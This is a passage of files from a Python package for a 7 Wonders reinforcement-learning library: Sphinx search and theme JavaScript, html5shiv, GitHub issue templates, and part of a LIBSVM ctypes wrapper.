" (" + descr + ")";
else if (showSearchSummary)
fetch(requestUrl)
.then((responseData) => responseData.text())
.then((data) => {
if (data)
listItem.appendChild(
Search.makeSearchSummary(data, searchTerms)
);
});
Search.output.appendChild(listItem);
};
const _finishSearch = (resultCount) => {
Search.stopPulse();
Search.title.innerText = _("Search Results");
if (!resultCount)
Search.status.innerText = Documentation.gettext(
"Your search did not match any documents. Please make sure that all words are spelled correctly and that you've selected enough categories."
);
else
Search.status.innerText = _(
`Search finished, found ${resultCount} page(s) matching the search query.`
);
};
const _displayNextItem = (
results,
resultCount,
searchTerms
) => {
// results left, load the summary and display it
// this is intended to be dynamic (don't sub resultsCount)
if (results.length) {
_displayItem(results.pop(), searchTerms);
setTimeout(
() => _displayNextItem(results, resultCount, searchTerms),
5
);
}
// search finished, update title and status message
else _finishSearch(resultCount);
};
/**
* Default splitQuery function. Can be overridden in ``sphinx.search`` with a
* custom function per language.
*
* The regular expression works by splitting the string on consecutive characters
* that are not Unicode letters, numbers, underscores, or emoji characters.
* This is the same as ``\W+`` in Python, preserving the surrogate pair area.
*/
if (typeof splitQuery === "undefined") {
var splitQuery = (query) => query
.split(/[^\p{Letter}\p{Number}_\p{Emoji_Presentation}]+/gu)
.filter(term => term) // remove remaining empty strings
}
/**
* Search Module
*/
const Search = {
_index: null,
_queued_query: null,
_pulse_status: -1,
htmlToText: (htmlString) => {
const htmlElement = new DOMParser().parseFromString(htmlString, 'text/html');
htmlElement.querySelectorAll(".headerlink").forEach((el) => { el.remove() });
const docContent = htmlElement.querySelector('[role="main"]');
if (docContent !== undefined) return docContent.textContent;
console.warn(
"Content block not found. Sphinx search tries to obtain it via '[role=main]'. Could you check your theme or template."
);
return "";
},
init: () => {
const query = new URLSearchParams(window.location.search).get("q");
document
.querySelectorAll('input[name="q"]')
.forEach((el) => (el.value = query));
if (query) Search.performSearch(query);
},
loadIndex: (url) =>
(document.body.appendChild(document.createElement("script")).src = url),
setIndex: (index) => {
Search._index = index;
if (Search._queued_query !== null) {
const query = Search._queued_query;
Search._queued_query = null;
Search.query(query);
}
},
hasIndex: () => Search._index !== null,
deferQuery: (query) => (Search._queued_query = query),
stopPulse: () => (Search._pulse_status = -1),
startPulse: () => {
if (Search._pulse_status >= 0) return;
const pulse = () => {
Search._pulse_status = (Search._pulse_status + 1) % 4;
Search.dots.innerText = ".".repeat(Search._pulse_status);
if (Search._pulse_status >= 0) window.setTimeout(pulse, 500);
};
pulse();
},
/**
* perform a search for something (or wait until index is loaded)
*/
performSearch: (query) => {
// create the required interface elements
const searchText = document.createElement("h2");
searchText.textContent = _("Searching");
const searchSummary = document.createElement("p");
searchSummary.classList.add("search-summary");
searchSummary.innerText = "";
const searchList = document.createElement("ul");
searchList.classList.add("search");
const out = document.getElementById("search-results");
Search.title = out.appendChild(searchText);
Search.dots = Search.title.appendChild(document.createElement("span"));
Search.status = out.appendChild(searchSummary);
Search.output = out.appendChild(searchList);
const searchProgress = document.getElementById("search-progress");
// Some themes don't use the search progress node
if (searchProgress) {
searchProgress.innerText = _("Preparing search...");
}
Search.startPulse();
// index already loaded, the browser was quick!
if (Search.hasIndex()) Search.query(query);
else Search.deferQuery(query);
},
/**
* execute search (requires search index to be loaded)
*/
query: (query) => {
const filenames = Search._index.filenames;
const docNames = Search._index.docnames;
const titles = Search._index.titles;
const allTitles = Search._index.alltitles;
const indexEntries = Search._index.indexentries;
// stem the search terms and add them to the correct list
const stemmer = new Stemmer();
const searchTerms = new Set();
const excludedTerms = new Set();
const highlightTerms = new Set();
const objectTerms = new Set(splitQuery(query.toLowerCase().trim()));
splitQuery(query.trim()).forEach((queryTerm) => {
const queryTermLower = queryTerm.toLowerCase();
// maybe skip this "word"
// stopwords array is from language_data.js
if (
stopwords.indexOf(queryTermLower) !== -1 ||
queryTerm.match(/^\d+$/)
)
return;
// stem the word
let word = stemmer.stemWord(queryTermLower);
// select the correct list
if (word[0] === "-") excludedTerms.add(word.substr(1));
else {
searchTerms.add(word);
highlightTerms.add(queryTermLower);
}
});
if (SPHINX_HIGHLIGHT_ENABLED) { // set in sphinx_highlight.js
localStorage.setItem("sphinx_highlight_terms", [...highlightTerms].join(" "))
}
// console.debug("SEARCH: searching for:");
// console.info("required: ", [...searchTerms]);
// console.info("excluded: ", [...excludedTerms]);
// array of [docname, title, anchor, descr, score, filename]
let results = [];
_removeChildren(document.getElementById("search-progress"));
const queryLower = query.toLowerCase();
for (const [title, foundTitles] of Object.entries(allTitles)) {
if (title.toLowerCase().includes(queryLower) && (queryLower.length >= title.length/2)) {
for (const [file, id] of foundTitles) {
let score = Math.round(100 * queryLower.length / title.length)
results.push([
docNames[file],
titles[file] !== title ? `${titles[file]} > ${title}` : title,
id !== null ? "#" + id : "",
null,
score,
filenames[file],
]);
}
}
}
// search for explicit entries in index directives
for (const [entry, foundEntries] of Object.entries(indexEntries)) {
if (entry.includes(queryLower) && (queryLower.length >= entry.length/2)) {
for (const [file, id] of foundEntries) {
let score = Math.round(100 * queryLower.length / entry.length)
results.push([
docNames[file],
titles[file],
id ? "#" + id : "",
null,
score,
filenames[file],
]);
}
}
}
// lookup as object
objectTerms.forEach((term) =>
results.push(...Search.performObjectSearch(term, objectTerms))
);
// lookup as search terms in fulltext
results.push(...Search.performTermsSearch(searchTerms, excludedTerms));
// let the scorer override scores with a custom scoring function
if (Scorer.score) results.forEach((item) => (item[4] = Scorer.score(item)));
// now sort the results by score (in opposite order of appearance, since the
// display function below uses pop() to retrieve items) and then
// alphabetically
results.sort((a, b) => {
const leftScore = a[4];
const rightScore = b[4];
if (leftScore === rightScore) {
// same score: sort alphabetically
const leftTitle = a[1].toLowerCase();
const rightTitle = b[1].toLowerCase();
if (leftTitle === rightTitle) return 0;
return leftTitle > rightTitle ? -1 : 1; // inverted is intentional
}
return leftScore > rightScore ? 1 : -1;
});
// remove duplicate search results
// note the reversing of results, so that in the case of duplicates, the highest-scoring entry is kept
let seen = new Set();
results = results.reverse().reduce((acc, result) => {
let resultStr = result.slice(0, 4).concat([result[5]]).map(v => String(v)).join(',');
if (!seen.has(resultStr)) {
acc.push(result);
seen.add(resultStr);
}
return acc;
}, []);
results = results.reverse();
// for debugging
//Search.lastresults = results.slice(); // a copy
// console.info("search results:", Search.lastresults);
// print the results
_displayNextItem(results, results.length, searchTerms);
},
/**
* search for object names
*/
performObjectSearch: (object, objectTerms) => {
const filenames = Search._index.filenames;
const docNames = Search._index.docnames;
const objects = Search._index.objects;
const objNames = Search._index.objnames;
const titles = Search._index.titles;
const results = [];
const objectSearchCallback = (prefix, match) => {
const name = match[4]
const fullname = (prefix ? prefix + "." : "") + name;
const fullnameLower = fullname.toLowerCase();
if (fullnameLower.indexOf(object) < 0) return;
let score = 0;
const parts = fullnameLower.split(".");
// check for different match types: exact matches of full name or
// "last name" (i.e. last dotted part)
if (fullnameLower === object || parts.slice(-1)[0] === object)
score += Scorer.objNameMatch;
else if (parts.slice(-1)[0].indexOf(object) > -1)
score += Scorer.objPartialMatch; // matches in last name
const objName = objNames[match[1]][2];
const title = titles[match[0]];
// If more than one term searched for, we require other words to be
// found in the name/title/description
const otherTerms = new Set(objectTerms);
otherTerms.delete(object);
if (otherTerms.size > 0) {
const haystack = `${prefix} ${name} ${objName} ${title}`.toLowerCase();
if (
[...otherTerms].some((otherTerm) => haystack.indexOf(otherTerm) < 0)
)
return;
}
let anchor = match[3];
if (anchor === "") anchor = fullname;
else if (anchor === "-") anchor = objNames[match[1]][1] + "-" + fullname;
const descr = objName + _(", in ") + title;
// add custom score for some objects according to scorer
if (Scorer.objPrio.hasOwnProperty(match[2]))
score += Scorer.objPrio[match[2]];
else score += Scorer.objPrioDefault;
results.push([
docNames[match[0]],
fullname,
"#" + anchor,
descr,
score,
filenames[match[0]],
]);
};
Object.keys(objects).forEach((prefix) =>
objects[prefix].forEach((array) =>
objectSearchCallback(prefix, array)
)
);
return results;
},
/**
* search for full-text terms in the index
*/
performTermsSearch: (searchTerms, excludedTerms) => {
// prepare search
const terms = Search._index.terms;
const titleTerms = Search._index.titleterms;
const filenames = Search._index.filenames;
const docNames = Search._index.docnames;
const titles = Search._index.titles;
const scoreMap = new Map();
const fileMap = new Map();
// perform the search on the required terms
searchTerms.forEach((word) => {
const files = [];
const arr = [
{ files: terms[word], score: Scorer.term },
{ files: titleTerms[word], score: Scorer.title },
];
// add support for partial matches
if (word.length > 2) {
const escapedWord = _escapeRegExp(word);
Object.keys(terms).forEach((term) => {
if (term.match(escapedWord) && !terms[word])
arr.push({ files: terms[term], score: Scorer.partialTerm });
});
Object.keys(titleTerms).forEach((term) => {
if (term.match(escapedWord) && !titleTerms[word])
arr.push({ files: titleTerms[word], score: Scorer.partialTitle });
});
}
// no match but word was a required one
if (arr.every((record) => record.files === undefined)) return;
// found search word in contents
arr.forEach((record) => {
if (record.files === undefined) return;
let recordFiles = record.files;
if (recordFiles.length === undefined) recordFiles = [recordFiles];
files.push(...recordFiles);
// set score for the word in each file
recordFiles.forEach((file) => {
if (!scoreMap.has(file)) scoreMap.set(file, {});
scoreMap.get(file)[word] = record.score;
});
});
// create the mapping
files.forEach((file) => {
if (fileMap.has(file) && fileMap.get(file).indexOf(word) === -1)
fileMap.get(file).push(word);
else fileMap.set(file, [word]);
});
});
// now check if the files don't contain excluded terms
const results = [];
for (const [file, wordList] of fileMap) {
// check if all requirements are matched
// as search terms with length < 3 are discarded
const filteredTermCount = [...searchTerms].filter(
(term) => term.length > 2
).length;
if (
wordList.length !== searchTerms.size &&
wordList.length !== filteredTermCount
)
continue;
// ensure that none of the excluded terms is in the search result
if (
[...excludedTerms].some(
(term) =>
terms[term] === file ||
titleTerms[term] === file ||
(terms[term] || []).includes(file) ||
(titleTerms[term] || []).includes(file)
)
)
break;
// select one (max) score for the file.
const score = Math.max(...wordList.map((w) => scoreMap.get(file)[w]));
// add result to the result list
results.push([
docNames[file],
titles[file],
"",
null,
score,
filenames[file],
]);
}
return results;
},
/**
* helper function to return a node containing the
* search summary for a given text. keywords is a list
* of stemmed words.
*/
makeSearchSummary: (htmlText, keywords) => {
const text = Search.htmlToText(htmlText);
if (text === "") return null;
const textLower = text.toLowerCase();
const actualStartPosition = [...keywords]
.map((k) => textLower.indexOf(k.toLowerCase()))
.filter((i) => i > -1)
.slice(-1)[0];
const startWithContext = Math.max(actualStartPosition - 120, 0);
const top = startWithContext === 0 ? "" : "...";
const tail = startWithContext + 240 < text.length ? "..." : "";
let summary = document.createElement("p");
summary.classList.add("context");
summary.textContent = top + text.substr(startWithContext, 240).trim() + tail;
return summary;
},
};
_ready(Search.init); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/searchtools.js | searchtools.js |
!function(n){var e={};function t(i){if(e[i])return e[i].exports;var o=e[i]={i:i,l:!1,exports:{}};return n[i].call(o.exports,o,o.exports,t),o.l=!0,o.exports}t.m=n,t.c=e,t.d=function(n,e,i){t.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:i})},t.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"__esModule",{value:!0})},t.t=function(n,e){if(1&e&&(n=t(n)),8&e)return n;if(4&e&&"object"==typeof n&&n&&n.__esModule)return n;var i=Object.create(null);if(t.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:n}),2&e&&"string"!=typeof n)for(var o in n)t.d(i,o,function(e){return n[e]}.bind(null,o));return i},t.n=function(n){var e=n&&n.__esModule?function(){return n.default}:function(){return n};return t.d(e,"a",e),e},t.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},t.p="",t(t.s=0)}([function(n,e,t){t(1),n.exports=t(3)},function(n,e,t){(function(){var e="undefined"!=typeof window?window.jQuery:t(2);n.exports.ThemeNav={navBar:null,win:null,winScroll:!1,winResize:!1,linkScroll:!1,winPosition:0,winHeight:null,docHeight:null,isRunning:!1,enable:function(n){var t=this;void 0===n&&(n=!0),t.isRunning||(t.isRunning=!0,e((function(e){t.init(e),t.reset(),t.win.on("hashchange",t.reset),n&&t.win.on("scroll",(function(){t.linkScroll||t.winScroll||(t.winScroll=!0,requestAnimationFrame((function(){t.onScroll()})))})),t.win.on("resize",(function(){t.winResize||(t.winResize=!0,requestAnimationFrame((function(){t.onResize()})))})),t.onResize()})))},enableSticky:function(){this.enable(!0)},init:function(n){n(document);var e=this;this.navBar=n("div.wy-side-scroll:first"),this.win=n(window),n(document).on("click","[data-toggle='wy-nav-top']",(function(){n("[data-toggle='wy-nav-shift']").toggleClass("shift"),n("[data-toggle='rst-versions']").toggleClass("shift")})).on("click",".wy-menu-vertical .current ul li a",(function(){var t=n(this);n("[data-toggle='wy-nav-shift']").removeClass("shift"),n("[data-toggle='rst-versions']").toggleClass("shift"),e.toggleCurrent(t),e.hashChange()})).on("click","[data-toggle='rst-current-version']",(function(){n("[data-toggle='rst-versions']").toggleClass("shift-up")})),n("table.docutils:not(.field-list,.footnote,.citation)").wrap("<div class='wy-table-responsive'></div>"),n("table.docutils.footnote").wrap("<div class='wy-table-responsive footnote'></div>"),n("table.docutils.citation").wrap("<div class='wy-table-responsive citation'></div>"),n(".wy-menu-vertical ul").not(".simple").siblings("a").each((function(){var t=n(this);expand=n('<button class="toctree-expand" title="Open/close menu"></button>'),expand.on("click",(function(n){return e.toggleCurrent(t),n.stopPropagation(),!1})),t.prepend(expand)}))},reset:function(){var n=encodeURI(window.location.hash)||"#";try{var e=$(".wy-menu-vertical"),t=e.find('[href="'+n+'"]');if(0===t.length){var i=$('.document [id="'+n.substring(1)+'"]').closest("div.section");0===(t=e.find('[href="#'+i.attr("id")+'"]')).length&&(t=e.find('[href="#"]'))}if(t.length>0){$(".wy-menu-vertical .current").removeClass("current").attr("aria-expanded","false"),t.addClass("current").attr("aria-expanded","true"),t.closest("li.toctree-l1").parent().addClass("current").attr("aria-expanded","true");for(let n=1;n<=10;n++)t.closest("li.toctree-l"+n).addClass("current").attr("aria-expanded","true");t[0].scrollIntoView()}}catch(n){console.log("Error expanding nav for anchor",n)}},onScroll:function(){this.winScroll=!1;var n=this.win.scrollTop(),e=n+this.winHeight,t=this.navBar.scrollTop()+(n-this.winPosition);n<0||e>this.docHeight||(this.navBar.scrollTop(t),this.winPosition=n)},onResize:function(){this.winResize=!1,this.winHeight=this.win.height(),this.docHeight=$(document).height()},hashChange:function(){this.linkScroll=!0,this.win.one("hashchange",(function(){this.linkScroll=!1}))},toggleCurrent:function(n){var e=n.closest("li");e.siblings("li.current").removeClass("current").attr("aria-expanded","false"),e.siblings().find("li.current").removeClass("current").attr("aria-expanded","false");var t=e.find("> ul li");t.length&&(t.removeClass("current").attr("aria-expanded","false"),e.toggleClass("current").attr("aria-expanded",(function(n,e){return"true"==e?"false":"true"})))}},"undefined"!=typeof window&&(window.SphinxRtdTheme={Navigation:n.exports.ThemeNav,StickyNav:n.exports.ThemeNav}),function(){for(var n=0,e=["ms","moz","webkit","o"],t=0;t<e.length&&!window.requestAnimationFrame;++t)window.requestAnimationFrame=window[e[t]+"RequestAnimationFrame"],window.cancelAnimationFrame=window[e[t]+"CancelAnimationFrame"]||window[e[t]+"CancelRequestAnimationFrame"];window.requestAnimationFrame||(window.requestAnimationFrame=function(e,t){var i=(new Date).getTime(),o=Math.max(0,16-(i-n)),r=window.setTimeout((function(){e(i+o)}),o);return n=i+o,r}),window.cancelAnimationFrame||(window.cancelAnimationFrame=function(n){clearTimeout(n)})}()}).call(window)},function(n,e){n.exports=jQuery},function(n,e,t){}]); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/js/theme.js | theme.js |
!function(a,b){function c(a,b){var c=a.createElement("p"),d=a.getElementsByTagName("head")[0]||a.documentElement;return c.innerHTML="x<style>"+b+"</style>",d.insertBefore(c.lastChild,d.firstChild)}function d(){var a=y.elements;return"string"==typeof a?a.split(" "):a}function e(a,b){var c=y.elements;"string"!=typeof c&&(c=c.join(" ")),"string"!=typeof a&&(a=a.join(" ")),y.elements=c+" "+a,j(b)}function f(a){var b=x[a[v]];return b||(b={},w++,a[v]=w,x[w]=b),b}function g(a,c,d){if(c||(c=b),q)return c.createElement(a);d||(d=f(c));var e;return e=d.cache[a]?d.cache[a].cloneNode():u.test(a)?(d.cache[a]=d.createElem(a)).cloneNode():d.createElem(a),!e.canHaveChildren||t.test(a)||e.tagUrn?e:d.frag.appendChild(e)}function h(a,c){if(a||(a=b),q)return a.createDocumentFragment();c=c||f(a);for(var e=c.frag.cloneNode(),g=0,h=d(),i=h.length;i>g;g++)e.createElement(h[g]);return e}function i(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createElement=function(c){return y.shivMethods?g(c,a,b):b.createElem(c)},a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+d().join().replace(/[\w\-:]+/g,function(a){return b.createElem(a),b.frag.createElement(a),'c("'+a+'")'})+");return n}")(y,b.frag)}function j(a){a||(a=b);var d=f(a);return!y.shivCSS||p||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}")),q||i(a,d),a}function k(a){for(var b,c=a.getElementsByTagName("*"),e=c.length,f=RegExp("^(?:"+d().join("|")+")$","i"),g=[];e--;)b=c[e],f.test(b.nodeName)&&g.push(b.applyElement(l(b)));return g}function l(a){for(var b,c=a.attributes,d=c.length,e=a.ownerDocument.createElement(A+":"+a.nodeName);d--;)b=c[d],b.specified&&e.setAttribute(b.nodeName,b.nodeValue);return e.style.cssText=a.style.cssText,e}function m(a){for(var b,c=a.split("{"),e=c.length,f=RegExp("(^|[\\s,>+~])("+d().join("|")+")(?=[[\\s,>+~#.:]|$)","gi"),g="$1"+A+"\\:$2";e--;)b=c[e]=c[e].split("}"),b[b.length-1]=b[b.length-1].replace(f,g),c[e]=b.join("}");return c.join("{")}function n(a){for(var b=a.length;b--;)a[b].removeNode()}function o(a){function b(){clearTimeout(g._removeSheetTimer),d&&d.removeNode(!0),d=null}var d,e,g=f(a),h=a.namespaces,i=a.parentWindow;return!B||a.printShived?a:("undefined"==typeof h[A]&&h.add(A),i.attachEvent("onbeforeprint",function(){b();for(var f,g,h,i=a.styleSheets,j=[],l=i.length,n=Array(l);l--;)n[l]=i[l];for(;h=n.pop();)if(!h.disabled&&z.test(h.media)){try{f=h.imports,g=f.length}catch(o){g=0}for(l=0;g>l;l++)n.push(f[l]);try{j.push(h.cssText)}catch(o){}}j=m(j.reverse().join("")),e=k(a),d=c(a,j)}),i.attachEvent("onafterprint",function(){n(e),clearTimeout(g._removeSheetTimer),g._removeSheetTimer=setTimeout(b,500)}),a.printShived=!0,a)}var p,q,r="3.7.3",s=a.html5||{},t=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,u=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,v="_html5shiv",w=0,x={};!function(){try{var a=b.createElement("a");a.innerHTML="<xyz></xyz>",p="hidden"in a,q=1==a.childNodes.length||function(){b.createElement("a");var a=b.createDocumentFragment();return"undefined"==typeof a.cloneNode||"undefined"==typeof a.createDocumentFragment||"undefined"==typeof a.createElement}()}catch(c){p=!0,q=!0}}();var y={elements:s.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video",version:r,shivCSS:s.shivCSS!==!1,supportsUnknownElements:q,shivMethods:s.shivMethods!==!1,type:"default",shivDocument:j,createElement:g,createDocumentFragment:h,addElements:e};a.html5=y,j(b);var z=/^$|\b(?:all|print)\b/,A="html5shiv",B=!q&&function(){var c=b.documentElement;return!("undefined"==typeof b.namespaces||"undefined"==typeof b.parentWindow||"undefined"==typeof c.applyElement||"undefined"==typeof c.removeNode||"undefined"==typeof a.attachEvent)}();y.type+=" print",y.shivPrint=o,o(b),"object"==typeof module&&module.exports&&(module.exports=y)}("undefined"!=typeof window?window:this,document); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/js/html5shiv-printshiv.min.js | html5shiv-printshiv.min.js |
!function(a,b){function c(a,b){var c=a.createElement("p"),d=a.getElementsByTagName("head")[0]||a.documentElement;return c.innerHTML="x<style>"+b+"</style>",d.insertBefore(c.lastChild,d.firstChild)}function d(){var a=t.elements;return"string"==typeof a?a.split(" "):a}function e(a,b){var c=t.elements;"string"!=typeof c&&(c=c.join(" ")),"string"!=typeof a&&(a=a.join(" ")),t.elements=c+" "+a,j(b)}function f(a){var b=s[a[q]];return b||(b={},r++,a[q]=r,s[r]=b),b}function g(a,c,d){if(c||(c=b),l)return c.createElement(a);d||(d=f(c));var e;return e=d.cache[a]?d.cache[a].cloneNode():p.test(a)?(d.cache[a]=d.createElem(a)).cloneNode():d.createElem(a),!e.canHaveChildren||o.test(a)||e.tagUrn?e:d.frag.appendChild(e)}function h(a,c){if(a||(a=b),l)return a.createDocumentFragment();c=c||f(a);for(var e=c.frag.cloneNode(),g=0,h=d(),i=h.length;i>g;g++)e.createElement(h[g]);return e}function i(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createElement=function(c){return t.shivMethods?g(c,a,b):b.createElem(c)},a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+d().join().replace(/[\w\-:]+/g,function(a){return b.createElem(a),b.frag.createElement(a),'c("'+a+'")'})+");return n}")(t,b.frag)}function j(a){a||(a=b);var d=f(a);return!t.shivCSS||k||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}")),l||i(a,d),a}var k,l,m="3.7.3-pre",n=a.html5||{},o=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,p=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,q="_html5shiv",r=0,s={};!function(){try{var a=b.createElement("a");a.innerHTML="<xyz></xyz>",k="hidden"in a,l=1==a.childNodes.length||function(){b.createElement("a");var a=b.createDocumentFragment();return"undefined"==typeof a.cloneNode||"undefined"==typeof a.createDocumentFragment||"undefined"==typeof a.createElement}()}catch(c){k=!0,l=!0}}();var t={elements:n.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video",version:m,shivCSS:n.shivCSS!==!1,supportsUnknownElements:l,shivMethods:n.shivMethods!==!1,type:"default",shivDocument:j,createElement:g,createDocumentFragment:h,addElements:e};a.html5=t,j(b),"object"==typeof module&&module.exports&&(module.exports=t)}("undefined"!=typeof window?window:this,document); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/js/html5shiv.min.js | html5shiv.min.js |
---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Desktop (please complete the following information):**
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Smartphone (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS8.1]
- Browser [e.g. stock browser, safari]
- Version [e.g. 22]
**Additional context**
Add any other context about the problem here.
| 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/.github/ISSUE_TEMPLATE/bug_report.md | bug_report.md |
---
name: Feature request
about: Suggest an idea for this project
title: ''
labels: ''
assignees: ''
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.
| 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/.github/ISSUE_TEMPLATE/feature_request.md | feature_request.md |
from ctypes import *
from ctypes.util import find_library
from os import path
import sys
__all__ = ['libsvm', 'svm_problem', 'svm_parameter',
'toPyModel', 'gen_svm_nodearray', 'print_null', 'svm_node', 'C_SVC',
'EPSILON_SVR', 'LINEAR', 'NU_SVC', 'NU_SVR', 'ONE_CLASS',
'POLY', 'PRECOMPUTED', 'PRINT_STRING_FUN', 'RBF',
'SIGMOID', 'c_double', 'svm_model']
try:
dirname = path.dirname(path.abspath(__file__))
if sys.platform == 'win32':
libsvm = CDLL(path.join(dirname, r'..\windows\libsvm.dll'))
else:
libsvm = CDLL(path.join(dirname, '../libsvm.so'))
except:
# For unix the prefix 'lib' is not considered.
if find_library('svm'):
libsvm = CDLL(find_library('svm'))
elif find_library('libsvm'):
libsvm = CDLL(find_library('libsvm'))
else:
raise Exception('LIBSVM library not found.')
C_SVC = 0
NU_SVC = 1
ONE_CLASS = 2
EPSILON_SVR = 3
NU_SVR = 4
LINEAR = 0
POLY = 1
RBF = 2
SIGMOID = 3
PRECOMPUTED = 4
PRINT_STRING_FUN = CFUNCTYPE(None, c_char_p)
def print_null(s):
return
def genFields(names, types):
return list(zip(names, types))
def fillprototype(f, restype, argtypes):
f.restype = restype
f.argtypes = argtypes
class svm_node(Structure):
_names = ["index", "value"]
_types = [c_int, c_double]
_fields_ = genFields(_names, _types)
def __str__(self):
return '%d:%g' % (self.index, self.value)
def gen_svm_nodearray(xi, feature_max=None, isKernel=None):
if isinstance(xi, dict):
index_range = xi.keys()
elif isinstance(xi, (list, tuple)):
if not isKernel:
xi = [0] + xi # idx should start from 1
index_range = range(len(xi))
else:
raise TypeError('xi should be a dictionary, list or tuple')
if feature_max:
assert(isinstance(feature_max, int))
index_range = filter(lambda j: j <= feature_max, index_range)
if not isKernel:
index_range = filter(lambda j:xi[j] != 0, index_range)
index_range = sorted(index_range)
ret = (svm_node * (len(index_range)+1))()
ret[-1].index = -1
for idx, j in enumerate(index_range):
ret[idx].index = j
ret[idx].value = xi[j]
max_idx = 0
if index_range:
max_idx = index_range[-1]
return ret, max_idx
class svm_problem(Structure):
_names = ["l", "y", "x"]
_types = [c_int, POINTER(c_double), POINTER(POINTER(svm_node))]
_fields_ = genFields(_names, _types)
def __init__(self, y, x, isKernel=None):
if len(y) != len(x):
raise ValueError("len(y) != len(x)")
self.l = l = len(y)
max_idx = 0
x_space = self.x_space = []
for i, xi in enumerate(x):
tmp_xi, tmp_idx = gen_svm_nodearray(xi,isKernel=isKernel)
x_space += [tmp_xi]
max_idx = max(max_idx, tmp_idx)
self.n = max_idx
self.y = (c_double * l)()
for i, yi in enumerate(y): self.y[i] = yi
self.x = (POINTER(svm_node) * l)()
for i, xi in enumerate(self.x_space): self.x[i] = xi
class svm_parameter(Structure):
_names = ["svm_type", "kernel_type", "degree", "gamma", "coef0",
"cache_size", "eps", "C", "nr_weight", "weight_label", "weight",
"nu", "p", "shrinking", "probability"]
_types = [c_int, c_int, c_int, c_double, c_double,
c_double, c_double, c_double, c_int, POINTER(c_int), POINTER(c_double),
c_double, c_double, c_int, c_int]
_fields_ = genFields(_names, _types)
def __init__(self, options = None):
if options == None:
options = ''
self.parse_options(options)
def __str__(self):
s = ''
attrs = svm_parameter._names + list(self.__dict__.keys())
values = map(lambda attr: getattr(self, attr), attrs)
for attr, val in zip(attrs, values):
s += (' %s: %s\n' % (attr, val))
s = s.strip()
return s
def set_to_default_values(self):
self.svm_type = C_SVC;
self.kernel_type = RBF
self.degree = 3
self.gamma = 0
self.coef0 = 0
self.nu = 0.5
self.cache_size = 100
self.C = 1
self.eps = 0.001
self.p = 0.1
self.shrinking = 1
self.probability = 0
self.nr_weight = 0
self.weight_label = (c_int*0)()
self.weight = (c_double*0)()
self.cross_validation = False
self.nr_fold = 0
self.print_func = cast(None, PRINT_STRING_FUN)
def parse_options(self, options):
if isinstance(options, list):
argv = options
elif isinstance(options, str):
argv = options.split()
else:
raise TypeError("arg 1 should be a list or a str.")
self.set_to_default_values()
self.print_func = cast(None, PRINT_STRING_FUN)
weight_label = []
weight = []
i = 0
while i < len(argv):
if argv[i] == "-s":
i = i + 1
self.svm_type = int(argv[i])
elif argv[i] == "-t":
i = i + 1
self.kernel_type = int(argv[i])
elif argv[i] == "-d":
i = i + 1
self.degree = int(argv[i])
elif argv[i] == "-g":
i = i + 1
self.gamma = float(argv[i])
elif argv[i] == "-r":
i = i + 1
self.coef0 = float(argv[i])
elif argv[i] == "-n":
i = i + 1
self.nu = float(argv[i])
elif argv[i] == "-m":
i = i + 1
self.cache_size = float(argv[i])
elif argv[i] == "-c":
i = i + 1
self.C = float(argv[i])
elif argv[i] == "-e":
i = i + 1
self.eps = float(argv[i])
elif argv[i] == "-p":
i = i + 1
self.p = float(argv[i])
elif argv[i] == "-h":
i = i + 1
self.shrinking = int(argv[i])
elif argv[i] == "-b":
i = i + 1
self.probability = int(argv[i])
elif argv[i] == "-q":
self.print_func = PRINT_STRING_FUN(print_null)
elif argv[i] == "-v":
i = i + 1
self.cross_validation = 1
